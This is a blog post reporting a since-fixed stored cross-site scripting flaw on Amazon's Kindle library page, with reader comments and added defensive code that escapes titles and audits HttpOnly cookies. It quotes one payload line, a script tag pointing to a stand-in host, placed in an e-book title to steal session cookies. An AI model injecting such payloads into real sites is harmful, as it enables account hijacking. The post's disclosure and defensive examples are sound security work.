Your Amazon Account Can be Hacked via a Kindle eBook

Amazon might not have a security issue at Audible, but they do have one on their main website.

Update: And it has been fixed.

A security researcher has reported, and I can confirm, that Amazon has a security hole on the "Manage Your Kindle" page - one which is relatively easy to fix.

Thanks to this hole, a hacker can gain access to the Amazon account simply by getting his victims to download an ebook which was itself hacked to include a script in the title:

Once an attacker manages to have an e-book (file, document, ...) with a title like

<script src="https://www.example.org/script.js"></script>

added to the victim's library, the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim's Amazon account can be compromised.
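The flaw described above is a stored cross-site scripting bug: an e-book title, which is attacker-controlled metadata, is written into the library page as raw HTML instead of as text. The following is an added example, not code from the post or from Amazon, that contrasts a vulnerable renderer with one that HTML-encodes the title first. The markup structure, function names and sample titles are all constructed for illustration; the second sample title mirrors the payload shape quoted in the post.

```javascript
// Added example (not Amazon's code): rendering an e-book title into a
// library page. The title comes from the book file, so it must be treated
// as untrusted text and HTML-encoded before it is placed in markup.

const htmlEscapes = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode the five characters that can break out of an HTML text node or
// a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => htmlEscapes[ch]);
}

// Vulnerable rendering: the title is concatenated straight into markup, so
// a title that contains a <script> tag becomes live script in the page.
function renderTitleUnsafe(title) {
  return `<li class="book">${title}</li>`;
}

// Hardened rendering: every title passes through escapeHtml first, so the
// browser shows the tag characters as text instead of parsing them.
function renderTitleSafe(title) {
  return `<li class="book">${escapeHtml(title)}</li>`;
}

// Crude check used only to illustrate the difference between the two
// renderers: does the generated markup contain a <script> element?
function containsScriptTag(markup) {
  return /<script[\s>]/i.test(markup);
}

// Render a whole library list with the given per-title renderer.
function renderLibrary(titles, render) {
  return `<ul id="library">${titles.map(render).join("")}</ul>`;
}

// Constructed sample titles. The second mirrors the payload shape quoted
// in the post; the third shows that ordinary punctuation survives encoding.
const sampleTitles = [
  "Pride and Prejudice",
  '<script src="https://www.example.org/script.js"></script>',
  'Tom & Jerry: "Quotes" <and> more',
];

console.log("unsafe:", renderLibrary(sampleTitles, renderTitleUnsafe));
console.log("safe:  ", renderLibrary(sampleTitles, renderTitleSafe));
```

Encoding at the point where the title is inserted into HTML is the fix the post calls "relatively easy"; it has to be applied to every place the title is rendered, which is presumably how a redesign of the page reintroduced the bug.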

I've tried it, and it does work. I saw something similar to the image which the hacker posted to his blog.


As a result I would urge caution against buying or downloading ebooks from untrustworthy sources - for the near future, at least. I expect Amazon will fix this problem shortly - that's what they did when it was first discovered last fall.

No, this is not a new story, though it is just coming to light. The German ebook blog AlleseBook.de broke the story earlier today when they reported on the hacker who discovered this issue - and more importantly, provided an ebook which could prove the hack worked.

Benjamin Daniel Mussler writes that he discovered this security issue last October. He notified Amazon in November, and they fixed it 4 days later. That is great, but then Amazon reintroduced the security hole earlier this year when they launched the new version of the "Manage Your Kindle" page.

As of the time I wrote this post, Mussler's hack still worked. There's even an ebook which you can use to test the hack yourself, if you like. I would recommend against it, but it is up to you.

On a related note, if you're worried about being hacked, there is a simple rule you can follow to keep yourself safe.

I have a rule against downloading apps from questionable websites, one which I have long since applied to Epub ebooks (because they can contain JavaScript) and PDFs (because they can hold entire apps). Now it would seem that rule needs to be expanded to include Kindle ebooks as well.

image by Pitel

About Nate Hoffelder (11585 Articles)
Nate Hoffelder is the founder and editor of The Digital Reader: "I've been into reading ebooks since forever, but I only got my first ereader in July 2007. Everything quickly spiraled out of control from there. Before I started this blog in January 2010 I covered ebooks, ebook readers, and digital publishing for about 2 years as a part of MobileRead Forums. It's a great community, and being a member is a joy. But I thought I could make something out of how I covered the news for MobileRead, so I started this blog."

5 Comments on Your Amazon Account Can be Hacked via a Kindle eBook

  1. To prevent losing personal info because of hacking, I don’t provide any real info to Amazon (except my credit card no.). I only enter my credit card no. when I want to buy a book (which I seldom do). After buying it, I delete the no. It is just always dangerous to save any personal info online.

    • "I don’t provide any real info to Amazon (except my credit card no.)" I applaud your caution, but you should be a bit more realistic about it… For one, you had to give also your name and your billing address, or otherwise your CC wouldn’t have gone through. But more importantly, note that even in this very limited case, there is no report that credit card numbers were leaked: this should not be a surprise, because you can’t even see your *own* credit card numbers on Amazon.com (go take a look). So if someone “takes over your account”, they *still* can’t see what your credit card numbers are. They also cannot change the shipping address that your account sends to, because this requires retyping your credit card number… which they don’t have. Likewise, they do not gain access to your password (this, too, is not shown to you on amazon.com).

      Do not confuse a very limited exploit – recall this required you to download an ebook to your Kindle that has “.js” in it, which is kind of like saying that email is very dangerous if you click on attachments willy-nilly – with the kind of massive data breach that Home Depot and others have had.

  2. Have always had a concern about the lack of security/protection on the Kindle. So with my Kindle+keyboard model, practice has been to download to computer and thence by USB cable to the device.

  3. This is potentially made worse by the fact that most of the cookies on Amazon’s site are not flagged HttpOnly. If a cookie is not flagged HttpOnly, it can be read by scripts. I see two different session tokens on my account, one of which is protected and one of which is not.
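The point in the comment above is what turns a script-injection bug into an account takeover: an injected script can only read cookies that were set without the HttpOnly attribute, via document.cookie. The following is an added example, not from the post or from any commenter, of the check a defender would run against a site's Set-Cookie response headers to list which cookies are exposed to page script and which also lack Secure. The header values and cookie names are constructed for illustration and are not Amazon's real cookies.

```javascript
// Added example (not from the post): audit Set-Cookie headers and report
// cookies that page script could read because they lack HttpOnly.

// Parse one Set-Cookie header value into its cookie name and an attribute
// map keyed by lowercased attribute name (flags map to true).
function parseSetCookie(header) {
  const [pair, ...attrParts] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const attributes = {};
  for (const part of attrParts) {
    if (!part) continue;
    const i = part.indexOf("=");
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    attributes[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return { name, attributes };
}

// Names of cookies without HttpOnly: these are visible to document.cookie,
// so an injected script can read and exfiltrate them.
function findScriptReadableCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !("httponly" in c.attributes))
    .map((c) => c.name);
}

// Names of cookies without Secure: these would also travel over plain HTTP.
function findNonSecureCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !("secure" in c.attributes))
    .map((c) => c.name);
}

// Constructed sample response headers (invented names, not Amazon's):
// two session tokens, one protected with HttpOnly and one without, plus a
// preference cookie that a script legitimately needs to read.
const sampleHeaders = [
  "session-token=abc123; Path=/; Secure; HttpOnly",
  "session-id=def456; Path=/; Secure",
  "ui-prefs=lang%3Den; Path=/",
];

console.log("readable by script:", findScriptReadableCookies(sampleHeaders));
console.log("sent over plain HTTP:", findNonSecureCookies(sampleHeaders));
```

Any cookie that appears in the first list and carries a session or authentication value should be reissued with HttpOnly; a cookie that genuinely must be read by page script (the preference cookie here) should never double as a credential.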

  4. Apparently Amazon has patched this up. I wonder if anyone’s tried a similar hack with Google Play Books. One is able to upload ePub files, and even read them in a browser, which might present a big surface area to attack. Don’t remember if Google’s ePub3 support includes JavaScript support.

